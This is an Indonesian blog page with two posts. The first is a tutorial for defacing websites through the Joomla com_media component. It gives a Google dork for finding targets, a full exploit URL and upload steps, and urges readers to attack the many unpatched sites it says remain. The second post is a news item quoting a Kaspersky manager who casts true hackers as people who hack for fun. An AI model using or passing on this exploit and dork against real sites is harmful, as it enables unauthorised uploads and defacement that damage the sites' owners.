Kamis, 09 Juni 2016

Tutorial Deface Dengan Com_Media




      Assalamualaikum mas mbah ^_^

Sekarang lanjut ke tutorial selanjutnya "Tutorial Deface Dengan Com_Media" sebenarnya exploit ini bisa disebut exploit jadul , soalnya ini exploit sudah lama sekali :D .

Tapi exploit nya masih joss kok . masih bnyak yg perawan :D

Langsung aja yah :D .

Dork : "inurl:com_media" (tanpa kutip , kembangin lagi yah itu cuman dork default :) )

Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

   Gunakan dorknya dulu dengan menggunakan mesin pencaharian google :D .





    Pilih salah satu target :D

Klau udah dapat contoh kyak gini .

www.site.com/

   Masukkan exploit yang di atas tadi :D , jadinya nanti kyak gini

www.site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

   Kalau vuln nanti gambarnya kek gini Mas dan Mbah :D





  Tinggal Upload deh file mu :D

Note: file yang bisa diupload berextensi .txt .jpg .gif .png, Untuk html dan php tidak bisa.





Selesai Path Uploadnya Disini > www.site.com/images/file/nama.txt


Gitu aja mudahkan.? , Langsung hjar master dan jgn lupa tetap enjoy :D

Waasalamualaikum ^_^

Thanks To : PhantomGhost - Sulawesi IT Sec

Source Images : https://sulawesi-itsecurity.blogspot.co.id/

Hacker Sejati Meretas Untuk Kesenangan




  Banyak peretas yang menjalankan aksinya untuk merusak sistem sampai mengeruk keuntungan materi. Namun Kaspersky menilai peretas yang menggunakan keahliannya untuk mengeruk uang orang lain bukanlah seorang hacker sejati.

  Dikatakan pihak Kaspersky, hacker atau peretas yang sesungguhnya itu bukan mencari keuntungan. Mereka melakukan aksi peretasan hanya untuk kesenangan pribadi.

  "Hacker yang sebenarnya itu, mereka melakukan hanya untuk kesenangan, bukan untuk mencari kepentingan ekonomi," ujar Territory Channel Manager Kaspersky SEA Indonesia, Dony Koemandarin, ditemui di Ritz Carlton Hotel, Mega Kuningan, Jakarta, Kamis, 26 November 2015.

  Lebih lanjut ia menjelaskan, saat ini banyak peretas bermunculan dan digunakan kemampuannya untuk kejahatan. Itu disebutnya bukan kategori hacker sebenarnya. Hacker, kata dia, melakukan sesuatu didasari‎ karena kesenangan.

  "Berbicara spionase, mata-mata perusahaan, cyber criminal dengan struktur hacker yang teroganisir, itu bukan hacker yang sebenarnya. Dengan di bawah organisasi yang baik, yang ditata dengan rapih cara kerjanya untuk melakukan peretasan‎, itu bukan hacker sesungguhnya," tegasnya.

  Peretas bagi dia itu, seperti kemampuan membobol password, membuat malware yang membuat dia menjadi terkenal, bukan untuk kejahatan dengan tingkat keberlanjutan yang mencari keuntungan semata.

  "‎Kalau ada yang bilang hacker juga manusia, balik lagi siapa yang memegang dia. Kalau direkrut aktivis, dia untuk kesenangan. Hacker itu gak punya tujuan, betul-betul untuk kesenangan. Biasanya, mereka meretas untuk membantu teman-teman dia," ucapnya.


Thanks To : Sulawesi IT Sec

Source : VIVA NEWS & https://sulawesi-itsecurity.blogspot.co.id/